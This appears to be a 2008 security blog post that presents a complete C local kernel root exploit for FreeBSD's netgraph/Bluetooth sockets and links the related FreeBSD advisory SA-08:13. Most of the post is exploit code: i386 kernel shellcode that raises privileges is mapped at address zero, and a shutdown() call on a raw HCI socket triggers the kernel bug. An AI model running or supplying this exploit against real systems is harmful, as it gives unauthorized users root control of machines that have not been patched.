tooth decay…
published: December 24, 2008
My first post to the blog is the exploit for a Bluetooth/netgraph kernel vuln in FreeBSD… Disappointed? Expected XSS? Go somewhere else… Web 2.0 may be fashionable but it is certainly not for us…
The official FreeBSD advisory is here: http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
/* blue-cavity.c
 *
 * FreeBSD >= 5.x local kernel root exploit for netgraph sockets...
 * by christer - Wed 29 Oct 2008
 *
 * - Tested on: FreeBSD 7.0 (x86)
 *
 * This particular exploit requires a configured bluetooth device.
 * Look at src if you need to know why, if you don't have a bt dev
 * on the target you may get lucky with other netgraph stuff
 *
 * - Private Source Code - DO NOT DISTRIBUTE -
 * http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$!
 *
 * BSDCITIZEN source code may NOT be used by penetration testers
 * without written consent from BSDCITIZEN!!!
 *
 * christer [ at ] signedness.org / bsdcitizen.org
 */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <bluetooth.h>
#include <err.h>

/*
 * Kernel shellcode for i386.. don't do anything stupid like
 * trying it on AMD64 kernels etc....
 */
static unsigned char shell[] =
    "\x64\xa1\x00\x00\x00\x00\x8b\x40"
    "\x04\x8b\x40\x30\xc7\x40\x04\x00"
    "\x00\x00\x00\xc3";

int
main(void)
{
    int s;

    /* Map one anonymous page at address 0 and copy the shellcode into it. */
    if (mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANON, -1, 0) ==
        MAP_FAILED)
        err(1, "mmap");
    memcpy((void *)0x0, shell, sizeof(shell));

    /* Raw HCI socket; the shutdown() call is what trips the kernel bug
     * covered by FreeBSD-SA-08:13. */
    s = socket(PF_BLUETOOTH, SOCK_RAW, BLUETOOTH_PROTO_HCI);
    if (s < 0)
        err(1, "socket");
    shutdown(s, SHUT_WR);
    return 0x1337;
}